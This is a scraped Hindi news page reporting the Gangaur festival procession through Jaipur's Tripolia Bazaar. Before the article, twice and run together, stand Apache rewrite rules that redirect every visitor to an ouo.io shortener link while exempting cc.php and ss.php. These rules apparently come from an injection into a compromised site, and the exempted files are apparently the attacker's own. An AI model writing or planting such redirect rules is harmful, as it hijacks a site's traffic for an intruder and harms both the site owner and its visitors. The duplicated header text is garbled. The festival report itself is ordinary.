
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 809
Nextजयपुर। देश-विदेश में मशहूर गणगौर का त्योहार आज पिंकसिटी जयपुर में बड़ी धूमधाम के साथ मनाया गया। इस अवसर पर माता गणगौर की सवारी शाही लवाजमे के साथ शहर के त्रिपोलिया बाजार से निकली। गणगौर माता की शाही शोभायात्रा त्रिपोलिया बाजार, छोटी चौपड़, गणगौरी बाजार से होती हुई तालकटोरा पहुंचेगी। इस आयोजन को देखने प्रदेश के साथ देश-विदेश से भी पर्यटकों का सैलाब उमड़ पड़ा। पर्यटकों के बैठने के लिए त्रिपोलिया गेट के सामने हिंद होटल की छत पर व्यवस्था की गई। आयोजन पयर्टन विभाग, जिला प्रशासन, महाराजा सवाई मानसिंह द्वितीय संग्रहालय ट्रस्ट और नगर निगम के संयुक्त तत्वावधान निकाली गई शोभायात्रा में लोक कलाकारों ने पारंपरिक नृत्य की प्रस्तुति दी। शोभायात्रा में परंपरागत नृत्य के साथ कच्छी घोड़ी, कालबेलिया नृत्य, बहुरूपिया कला, गेर और चकरी सहित अन्य मनोरंजक कार्यक्रम आकर्षण का केंद्र बने रहे। पारंपरिक तोपधारक वाहन, सजे रथ, सजे-धजे घोड़े और ऊंट का लवाजमा अलग ही छंटा बिखेर रहा था। सवारी के अंत में ढाल धारी चौबदार और पारंपरिक वेशभूषा में महिलाएं शामिल मंगलगान करती चल रही थीं।